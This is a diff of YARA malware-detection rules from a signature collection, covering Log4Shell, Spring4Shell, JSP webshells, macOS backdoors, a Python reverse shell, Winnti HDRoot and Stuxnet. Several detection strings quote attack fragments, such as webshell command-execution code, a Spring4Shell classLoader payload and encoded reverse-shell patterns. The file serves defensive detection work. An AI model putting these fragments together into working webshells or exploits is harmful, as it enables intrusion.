-		description = "Detects error messages related to JDNI usage in log files that can indicate a Log4Shell / Log4j exploitation"
-		author = "Florian Roth (Nextron Systems)"
-		id = "68bcf043-58b4-54a9-b024-64871b5d535f"
-		date = "2021-12-10"
-		modified = "2023-06-23"
-		reference = "https://twitter.com/marcioalm/status/1470361495405875200?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_log4j_cve_2021_44228.yar#L213-L226"
+		description = "Python Base64 encoded reverse shell"
+		author = "John Lambert @JohnLaTwC"
+		id = "dda831ae-d0ca-5d5a-bdb3-e7c146a770b4"
+		date = "2018-02-24"
+		modified = "2023-12-05"
+		reference = "https://www.virustotal.com/en/file/9ec5102bcbabc45f2aa7775464f33019cfbe9d766b1332ee675957c923a17efd/analysis/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_python_reverse_shell.yara#L1-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2ab98814b2ed66b0bda875fecc0b09db82035d7edcdb0af65f815817ec8c6cc8"
-		score = 70
-		quality = 85
-		tags = ""
+		logic_hash = "12b1424265cd0ea62b8dd5c08933f1285a156d906df6c31ca9a94fbc303f248e"
+		score = 75
+		quality = 83
+		tags = "FILE"
+		hash1 = "9ec5102bcbabc45f2aa7775464f33019cfbe9d766b1332ee675957c923a17efd"
+		hash2 = "bfb5c622a3352bb71b86df81c45ccefaa68b9f7cc0a3577e8013aad951308f12"
 
 	strings:
-		$x1 = "FATAL log4j - Message: BadAttributeValueException: "
+		$h1 = "import base64" fullword ascii
+		$s1 = "b64decode" fullword ascii
+		$s2 = "lambda" fullword ascii
+		$s3 = "version_info" fullword ascii
+		$enc_x0 = /(AG8AYwBrAGUAdAAuAFMATwBDAEsAXwBTAFQAUgBFAEEATQ|b2NrZXQuU09DS19TVFJFQU|c29ja2V0LlNPQ0tfU1RSRUFN|cwBvAGMAawBlAHQALgBTAE8AQwBLAF8AUwBUAFIARQBBAE0A|MAbwBjAGsAZQB0AC4AUwBPAEMASwBfAFMAVABSAEUAQQBNA|NvY2tldC5TT0NLX1NUUkVBT)/ ascii
+		$enc_x1 = /(4AYwBvAG4AbgBlAGMAdAAoACgA|5jb25uZWN0KC|AGMAbwBuAG4AZQBjAHQAKAAoA|LgBjAG8AbgBuAGUAYwB0ACgAKA|LmNvbm5lY3QoK|Y29ubmVjdCgo)/
+		$enc_x2 = /(AGkAbQBlAC4AcwBsAGUAZQBwA|aW1lLnNsZWVw|dABpAG0AZQAuAHMAbABlAGUAcA|dGltZS5zbGVlc|QAaQBtAGUALgBzAGwAZQBlAHAA|RpbWUuc2xlZX)/
+		$enc_x3 = /(4AcgBlAGMAdg|5yZWN2|AHIAZQBjAHYA|cmVjd|LgByAGUAYwB2A|LnJlY3)/
 
 	condition:
-		1 of them
+		uint32be( 0 ) == 0x696d706f and $h1 at 0 and filesize < 40KB and all of ( $s* ) and all of ( $enc_x* )
 }
-rule SIGNATURE_BASE_OSX_Backdoor_Evilosx : FILE
+rule SIGNATURE_BASE_Hdroot_Sample_Jul17_1 : FILE
 {
 	meta:
-		description = "EvilOSX MacOS/OSX backdoor"
-		author = "John Lambert @JohnLaTwC"
-		id = "6940e355-53d2-51e3-afd0-13303a311e9a"
-		date = "2018-02-23"
+		description = "Detects HDRoot samples"
+		author = "Florian Roth (Nextron Systems)"
+		id = "06356f8a-bacd-51bc-a6f4-107983a9c16e"
+		date = "2017-07-07"
 		modified = "2023-12-05"
-		reference = "https://github.com/Marten4n6/EvilOSX, https://twitter.com/JohnLaTwC/status/966139336436498432"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_osx_evilosx.yar#L1-L34"
+		reference = "Winnti HDRoot VT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_hdroot.yar#L11-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "89e5b8208daf85f549d9b7df8e2a062e47f15a5b08462a4224f73c0a6223972a"
-		logic_hash = "393abf7cf74f8d079049cf8f0bdb3a79bf16185c80c43b823e19b67a9031aef6"
+		logic_hash = "41127e6d70af4b095555285f3d5570fc4dbe2a7918664502057cdc4fed8fab33"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6d2ad82f455becc8c830d000633a370857928c584246a7f41fe722cc46c0d113"
 
 	strings:
-		$h1 = "#!/usr/bin/env"
-		$s0 = "import base64" fullword ascii
-		$s1 = "b64decode" fullword ascii
-		$x0 = "EvilOSX" fullword ascii
-		$x1 = "get_launch_agent_directory" fullword ascii
-		$enc_x0 = /(AHYAaQBsAE8AUwBYA|dmlsT1NY|RQB2AGkAbABPAFMAWA|RXZpbE9TW|UAdgBpAGwATwBTAFgA|V2aWxPU1)/ ascii
-		$enc_x1 = /(AGUAdABfAGwAYQB1AG4AYwBoAF8AYQBnAGUAbgB0AF8AZABpAHIAZQBjAHQAbwByAHkA|cAZQB0AF8AbABhAHUAbgBjAGgAXwBhAGcAZQBuAHQAXwBkAGkAcgBlAGMAdABvAHIAeQ|dldF9sYXVuY2hfYWdlbnRfZGlyZWN0b3J5|Z2V0X2xhdW5jaF9hZ2VudF9kaXJlY3Rvcn|ZwBlAHQAXwBsAGEAdQBuAGMAaABfAGEAZwBlAG4AdABfAGQAaQByAGUAYwB0AG8AcgB5A|ZXRfbGF1bmNoX2FnZW50X2RpcmVjdG9ye)/ ascii
+		$s1 = "gleupdate.dll" fullword ascii
+		$s2 = "\\DosDevices\\%ws\\system32\\%ws" wide
+		$s3 = "l\\Driver\\nsiproxy" fullword wide
 
 	condition:
-		uint32( 0 ) == 0x752f2123 and $h1 at 0 and filesize < 30KB and all of ( $s* ) and 1 of ( $x* ) or 1 of ( $enc_x* )
+		( uint16( 0 ) == 0x5a4d and filesize < 60KB and 3 of them )
 }
-rule SIGNATURE_BASE_Persistence_Agent_Macos : FILE
+rule SIGNATURE_BASE_Hdroot_Sample_Jul17_2 : FILE
 {
 	meta:
-		description = "Detects a Python agent that establishes persistence on macOS"
-		author = "John Lambert @JohnLaTwC"
-		id = "9c69af3c-ee85-58ac-8b78-66760addc117"
-		date = "2023-12-05"
+		description = "Detects HDRoot samples"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9ce9c0f4-e6f9-5033-ba74-367e6d741650"
+		date = "2017-07-07"
 		modified = "2023-12-05"
-		reference = "https://ghostbin.com/paste/mz5nf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_osx_pyagent_persistence.yar#L1-L40"
+		reference = "Winnti HDRoot VT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_hdroot.yar#L28-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4288a81779a492b5b02bad6e90b2fa6212fa5f8ee87cc5ec9286ab523fc02446 cec7be2126d388707907b4f9d681121fd1e3ca9f828c029b02340ab1331a5524 e1cf136be50c4486ae8f5e408af80b90229f3027511b4beed69495a042af95be"
-		logic_hash = "2613fcb32cbdbb24df6c48fcb5d16549783e50246d2cdb8c473375644dd88254"
+		logic_hash = "94288abb5c4da7c4b07eeae55070797af1556dac35ad012aff1bbe8c05e0a215"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "1c302ed9786fc600073cc6f3ed2e50e7c23785c94a2908f74f92971d978b704b"
+		hash2 = "3b7cfa40e26fb6b079b55ec030aba244a6429e263a3d9832e32ab09e7a3c4a9c"
+		hash3 = "71eddf71a94c5fd04c9f3ff0ca1eb6b1770df1a3a8f29689fb8588427b5c9e8e"
+		hash4 = "80e088f2fd2dbde0f9bc21e056b6521991929c4e0ecd3eb5833edff6362283f4"
 
 	strings:
-		$h1 = "#!/usr/bin/env python"
-		$s_1 = "<plist" ascii fullword
-		$s_2 = "ProgramArguments" ascii fullword
-		$s_3 = "Library" ascii fullword
-		$sinterval_1 = "StartInterval" ascii fullword
-		$sinterval_2 = "RunAtLoad" ascii fullword
-		$e_1 = /(AHAAbABpAHMAdA|cGxpc3|PABwAGwAaQBzAHQA|PHBsaXN0|wAcABsAGkAcwB0A|xwbGlzd)/ ascii
-		$e_2 = /(AAcgBvAGcAcgBhAG0AQQByAGcAdQBtAGUAbgB0AHMA|AHIAbwBnAHIAYQBtAEEAcgBnAHUAbQBlAG4AdABzA|Byb2dyYW1Bcmd1bWVudH|cm9ncmFtQXJndW1lbnRz|UAByAG8AZwByAGEAbQBBAHIAZwB1AG0AZQBuAHQAcw|UHJvZ3JhbUFyZ3VtZW50c)/ ascii
-		$e_4 = /(AGkAYgByAGEAcgB5A|aWJyYXJ5|TABpAGIAcgBhAHIAeQ|TGlicmFye|wAaQBiAHIAYQByAHkA|xpYnJhcn)/ ascii
-		$einterval_a = /(AHQAYQByAHQASQBuAHQAZQByAHYAYQBsA|dGFydEludGVydmFs|MAdABhAHIAdABJAG4AdABlAHIAdgBhAGwA|N0YXJ0SW50ZXJ2YW|U3RhcnRJbnRlcnZhb|UwB0AGEAcgB0AEkAbgB0AGUAcgB2AGEAbA)/ ascii
-		$einterval_b = /(AHUAbgBBAHQATABvAGEAZA|dW5BdExvYW|IAdQBuAEEAdABMAG8AYQBkA|J1bkF0TG9hZ|UgB1AG4AQQB0AEwAbwBhAGQA|UnVuQXRMb2Fk)/ ascii
+		$x1 = "http://microsoftcompanywork.htm" fullword ascii
+		$x2 = "compose.aspx?s=%4X%4X%4X%4X%4X%4X" fullword ascii
+		$t1 = "http://babelfish.yahoo.com/translate_url?" fullword ascii
+		$t2 = "http://translate.google.com/translate?prev=hp&hl=en&js=n&u=%s?%d&sl=es&tl=en" fullword ascii
+		$u1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5." ascii
+		$u2 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)" fullword ascii
+		$u3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; TERA:" fullword ascii
+		$s1 = "\\system32\\ntoskrnl.exe" ascii
+		$s2 = "Schedsvc.dll" fullword wide
+		$s3 = "dllserver64.dll" fullword ascii
+		$s4 = "C:\\TERA_SR.txt" fullword ascii
+		$s5 = "updatevnsc.dat" fullword wide
+		$s6 = "tera dll service global event" fullword ascii
+		$s7 = "Referer: http://%s/%s" fullword ascii
+		$s8 = "tera replace dll config" fullword ascii
+		$s9 = "SetupDll64.dll" fullword ascii
+		$s10 = "copy %%ComSpec%% \"%s\"" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x752f2123 and $h1 at 0 and filesize < 120KB and ( ( all of ( $s_* ) and 1 of ( $sinterval* ) ) or ( all of ( $e_* ) and 1 of ( $einterval* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( 1 of ( $x* ) or all of ( $u* ) or 8 of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_JSP_Nov21_1 : FILE
+rule SIGNATURE_BASE_Unspecified_Malware_Jul17_1A : FILE
 {
 	meta:
-		description = "Detects JSP webshells"
+		description = "Detects samples of an unspecified malware - July 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "117eed28-c44e-5983-b4c7-b555fc06d923"
-		date = "2021-11-23"
+		id = "348515d5-784f-519d-b426-87b8a53de5f3"
+		date = "2017-07-07"
 		modified = "2023-12-05"
-		reference = "https://www.ic3.gov/Media/News/2021/211117-2.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_spring4shell.yar#L2-L17"
+		reference = "Winnti HDRoot VT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_hdroot.yar#L66-L83"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1dac7706421961c71ba6f8d7a223b80e4b77bf206bfb64ee18c7cc894b062a3c"
-		score = 70
+		logic_hash = "e23af53be3e700055ea6536669065c131e7f674d45e43a389447c8c1f549dee5"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e1c38142b6194237a4cd4603829aa6edb6436e7bba15e3e6b0c9e8c6b629b42b"
 
 	strings:
-		$x1 = "request.getParameter(\"pwd\")" ascii
-		$x2 = "excuteCmd(request.getParameter(" ascii
-		$x3 = "getRuntime().exec (request.getParameter(" ascii
-		$x4 = "private static final String PW = \"whoami\"" ascii
+		$s1 = "%SystemRoot%\\System32\\wuauserv.dll" fullword ascii
+		$s2 = "systemroot%\\system32\\wuauserv.dll" fullword ascii
+		$s3 = "ocgen.logIN" fullword wide
+		$s4 = "ocmsn.logIN" fullword wide
+		$s5 = "Install.log" fullword wide
 
 	condition:
-		filesize < 400KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 900KB and all of them )
 }
-rule SIGNATURE_BASE_EXPL_POC_Springcore_0Day_Indicators_Mar22_1
+rule SIGNATURE_BASE_Stuxnet_Malware_1
 {
 	meta:
-		description = "Detects indicators found after SpringCore exploitation attempts and in the POC script"
+		description = "Stuxnet Sample - file malware.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "297e4b57-f831-56e0-a391-1ffbc9a4d438"
-		date = "2022-03-30"
+		id = "1f475dc3-ebb3-508f-b696-3d9ea270b13d"
+		date = "2016-07-09"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/vxunderground/status/1509170582469943303"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_spring4shell.yar#L19-L34"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stuxnet.yar#L10-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "39fb62ec7953dae0a88e39e73e3ff286fc19cb8f21f8feb869a1875f6ba70cfb"
-		score = 70
+		logic_hash = "8caa6bddef3c05e572ef342513190832900dcb1a7a56589ed7df48b3c6992ed1"
+		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9c891edb5da763398969b6aaa86a5d46971bd28a455b20c2067cb512c9f9a0f8"
 
 	strings:
-		$x1 = "java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di"
-		$x2 = "?pwd=j&cmd=whoami"
-		$x3 = ".getParameter(%22pwd%22)"
-		$x4 = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7B"
+		$op1 = { 8b 45 08 35 dd 79 19 ae 33 c9 8b 55 08 89 02 89 }
+		$op2 = { 74 36 8b 7f 08 83 ff 00 74 2e 0f b7 1f 8b 7f 04 }
+		$op3 = { 74 70 81 78 05 8d 54 24 04 75 1b 81 78 08 04 cd }
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_EXPL_POC_Springcore_0Day_Webshell_Mar22_1 : FILE
+rule SIGNATURE_BASE_Stuxnet_Malware_2 : FILE
 {
 	meta:
-		description = "Detects webshell found after SpringCore exploitation attempts POC script"
+		description = "Stuxnet Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e7047c98-3c60-5211-9ad5-2bfdfb35d493"
-		date = "2022-03-30"
+		id = "2865353c-44c5-5280-878b-daadcef017b8"
+		date = "2016-07-09"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/vxunderground/status/1509170582469943303"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_spring4shell.yar#L36-L50"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stuxnet.yar#L43-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "17282b66899356a6051f0b47a7a3f02265737283d760f2256e03a2b934bb63b8"
-		score = 70
+		logic_hash = "ecf992f8fd38b1ab3e05bfe05f260bcaf617f168484477aa81acb9b517b9f3e7"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "63e6b8136058d7a06dfff4034b4ab17a261cdf398e63868a601f77ddd1b32802"
 
 	strings:
-		$x1 = ".getInputStream(); int a = -1; byte[] b = new byte[2048];"
-		$x2 = "if(\"j\".equals(request.getParameter(\"pwd\")"
-		$x3 = ".getRuntime().exec(request.getParameter(\"cmd\")).getInputStream();"
+		$s1 = "\\SystemRoot\\System32\\hal.dll" wide
+		$s2 = "http://www.jmicron.co.tw0" fullword ascii
 
 	condition:
-		filesize < 200KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 70KB and all of them
 }
-rule SIGNATURE_BASE_TA459_Malware_May17_1 : FILE
+rule SIGNATURE_BASE_Stuxnet_Dll : FILE
 {
 	meta:
-		description = "Detects TA459 related malware"
+		description = "Stuxnet Sample - file dll.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "eb5d2464-ab95-5f5d-8b20-fa023da53130"
-		date = "2017-05-31"
+		id = "92d812a6-2622-56e4-96c5-eb65ab7055b9"
+		date = "2016-07-09"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/RLf9qU"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta459.yar#L12-L26"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stuxnet.yar#L59-L72"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2655d4c3a28ad2f77bbf50cd3dface7de49f675f0f974aa44d9b69c3f803da30"
+		logic_hash = "0c192153c268fdd330d3b9e2eb0d8383bd50ce6d036409f0cc0c9273ba8201b3"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5fd61793d498a395861fa263e4438183a3c4e6f1e4f098ac6e97c9d0911327bf"
+		hash1 = "9e392277f62206098cf794ddebafd2817483cfd57ec03c2e05e7c3c81e72f562"
 
 	strings:
-		$s3 = "xtsewy" fullword ascii
-		$s6 = "CW&mhAklnfVULL" ascii
+		$s1 = "SUCKM3 FROM EXPLORER.EXE MOTH4FUCKA #@!" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x6152 and filesize < 800KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and $s1
 }
-rule SIGNATURE_BASE_TA459_Malware_May17_2 : FILE
+rule SIGNATURE_BASE_Stuxnet_Shortcut_To : FILE
 {
 	meta:
-		description = "Detects TA459 related malware"
+		description = "Stuxnet Sample - file Copy of Shortcut to.lnk"
 		author = "Florian Roth (Nextron Systems)"
-		id = "62954422-4657-5ded-9883-bb78eac697fb"
-		date = "2017-05-31"
+		id = "582ab12b-808e-5d5c-ba36-3bb987c4c552"
+		date = "2016-07-09"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/RLf9qU"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta459.yar#L28-L45"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stuxnet.yar#L74-L87"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9904f3905672e5209df037dff1fa2e4d88ee33531096045eb9b9f7460458b6a2"
+		logic_hash = "a8119500d38bcfc60620265386f31899e586f62e1ceeeff365fd0018ab39c30e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4601133e94c4bc74916a9d96a5bc27cc3125cdc0be7225b2c7d4047f8506b3aa"
+		hash1 = "801e3b6d84862163a735502f93b9663be53ccbdd7f12b0707336fecba3a829a2"
 
 	strings:
-		$a1 = "Mcutil.dll" fullword ascii
-		$a2 = "mcut.exe" fullword ascii
-		$s1 = "Software\\WinRAR SFX" fullword ascii
-		$s2 = "AYou may need to run this self-extracting archive as administrator" fullword wide
+		$x1 = "\\\\.\\STORAGE#Volume#_??_USBSTOR#Disk&Ven_Kingston&Prod_DataTraveler_2.0&Rev_PMAP#5B6B098B97BE&0#{53f56307-b6bf-11d0-94f2-00a0c" wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 900KB and all of ( $a* ) and 1 of ( $s* ) )
+		uint16( 0 ) == 0x004c and filesize < 10KB and $x1
 }
-rule SIGNATURE_BASE_Regin_APT_Kerneldriver_Generic_A : FILE
+rule SIGNATURE_BASE_Stuxnet_Malware_3 : FILE
 {
 	meta:
-		description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
-		author = "@Malwrsignatures - included in APT Scanner THOR"
-		id = "4cea1d45-b797-51b2-baa7-e66c8c0206ea"
-		date = "2014-11-23"
-		modified = "2024-04-24"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_regin_fiveeyes.yar#L14-L41"
+		description = "Stuxnet Sample - file ~WTR4141.tmp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1b0b301a-bf29-5080-a7d6-4d5f389bdf50"
+		date = "2016-07-09"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stuxnet.yar#L89-L110"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1cc367dff184f2b458a2b7c0c88a44095714525ca6bb115d03e6331cf1f22116"
+		logic_hash = "d8c546fb74b419d46bab855fa07a55833ab0a23eb4081ce24a5d4ab0e4bf09dc"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "187044596bc1328efa0ed636d8aa4a5c"
-		hash2 = "06665b96e293b23acc80451abb413e50"
-		hash3 = "d240f06e98c8d3e647cbf4d442d79475"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6bcf88251c876ef00b2f32cf97456a3e306c2a263d487b0a50216c6e3cc07c6a"
+		hash2 = "70f8789b03e38d07584f57581363afa848dd5c3a197f2483c6dfa4f3e7f78b9b"
 
 	strings:
-		$m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 }
-		$m1 = { 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e }
-		$s0 = "atapi.sys" fullword wide
-		$s1 = "disk.sys" fullword wide
-		$s3 = "h.data" fullword ascii
-		$s4 = "\\system32" ascii
-		$s5 = "\\SystemRoot" ascii
-		$s6 = "system" fullword ascii
-		$s7 = "temp" fullword ascii
-		$s8 = "windows" fullword ascii
-		$x1 = "LRich6" fullword ascii
-		$x2 = "KeServiceDescriptorTable" fullword ascii
+		$x1 = "SHELL32.DLL.ASLR." fullword wide
+		$s1 = "~WTR4141.tmp" fullword wide
+		$s2 = "~WTR4132.tmp" fullword wide
+		$s3 = "totalcmd.exe" fullword wide
+		$s4 = "wincmd.exe" fullword wide
+		$s5 = "http://www.realtek.com0" fullword ascii
+		$s6 = "{%08x-%08x-%08x-%08x}" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $m0 at 0 and $m1 and all of ( $s* ) and 1 of ( $x* )
+		( uint16( 0 ) == 0x5a4d and filesize < 150KB and ( $x1 or 3 of ( $s* ) ) ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_Regin_APT_Kerneldriver_Generic_B : FILE
+rule SIGNATURE_BASE_Stuxnet_Malware_4 : FILE
 {
 	meta:
-		description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
-		author = "@Malwrsignatures - included in APT Scanner THOR"
-		id = "14f31b2d-4753-54e8-891a-e28689ba57db"
-		date = "2014-11-23"
-		modified = "2024-04-24"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_regin_fiveeyes.yar#L43-L94"
+		description = "Stuxnet Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fd3fa395-15f1-5a11-9740-03b897e4620b"
+		date = "2016-07-09"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stuxnet.yar#L112-L128"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c2dee4f94f9eefb1c11f6e86144c6bfafc0845768200f5a839ffe3dd5d38294d"
+		logic_hash = "a4ad77490d17cf897c4639f0b9f9473267886e99a94b4f506670207497117764"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		hash1 = "ffb0b9b5b610191051a7bdf0806e1e47"
-		hash2 = "bfbe8c3ee78750c3a520480700e440f8"
-		hash3 = "b29ca4f22ae7b7b25f79c1d4a421139d"
-		hash4 = "06665b96e293b23acc80451abb413e50"
-		hash5 = "2c8b9d2885543d7ade3cae98225e263b"
-		hash6 = "4b6b86c7fec1c574706cecedf44abded"
-		hash7 = "187044596bc1328efa0ed636d8aa4a5c"
-		hash8 = "d240f06e98c8d3e647cbf4d442d79475"
-		hash9 = "6662c390b2bbbd291ec7987388fc75d7"
-		hash10 = "1c024e599ac055312a4ab75b3950040a"
-		hash11 = "ba7bb65634ce1e30c1e5415be3d1db1d"
-		hash12 = "b505d65721bb2453d5039a389113b566"
-		hash13 = "b269894f434657db2b15949641a67532"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0d8c2bcb575378f6a88d17b5f6ce70e794a264cdc8556c8e812f0b5f9c709198"
+		hash2 = "1635ec04f069ccc8331d01fdf31132a4bc8f6fd3830ac94739df95ee093c555c"
 
 	strings:
-		$m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 }
-		$s1 = { 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e }
-		$s2 = "H.data" fullword ascii nocase
-		$s3 = "INIT" fullword ascii
-		$s4 = "ntoskrnl.exe" fullword ascii
-		$v1 = "\\system32" ascii
-		$v2 = "\\SystemRoot" ascii
-		$v3 = "KeServiceDescriptorTable" fullword ascii
-		$w1 = "\\system32" ascii
-		$w2 = "\\SystemRoot" ascii
-		$w3 = "LRich6" fullword ascii
-		$x1 = "_snprintf" ascii
-		$x2 = "_except_handler3" ascii
-		$y1 = "mbstowcs" fullword ascii
-		$y2 = "wcstombs" fullword ascii
-		$y3 = "KeGetCurrentIrql" fullword ascii
-		$z1 = "wcscpy" fullword ascii
-		$z2 = "ZwCreateFile" fullword ascii
-		$z3 = "ZwQueryInformationFile" fullword ascii
-		$z4 = "wcslen" fullword ascii
-		$z5 = "atoi" fullword ascii
+		$x1 = "\\objfre_w2k_x86\\i386\\guava.pdb" ascii
+		$x2 = "MRxCls.sys" fullword wide
+		$x3 = "MRXNET.Sys" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $m0 at 0 and all of ( $s* ) and ( all of ( $v* ) or all of ( $w* ) or all of ( $x* ) or all of ( $y* ) or all of ( $z* ) ) and filesize < 20KB
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and 1 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_Regin_APT_Kerneldriver_Generic_C : FILE
+rule SIGNATURE_BASE_Stuxnet_Maindll_Decrypted_Unpacked
 {
 	meta:
-		description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
-		author = "@Malwrsignatures - included in APT Scanner THOR"
-		id = "2006b3f0-abd1-5274-8b18-75368671e062"
-		date = "2014-11-23"
-		modified = "2024-04-24"
-		reference = "https://github.com/Neo23x0/signature-base"
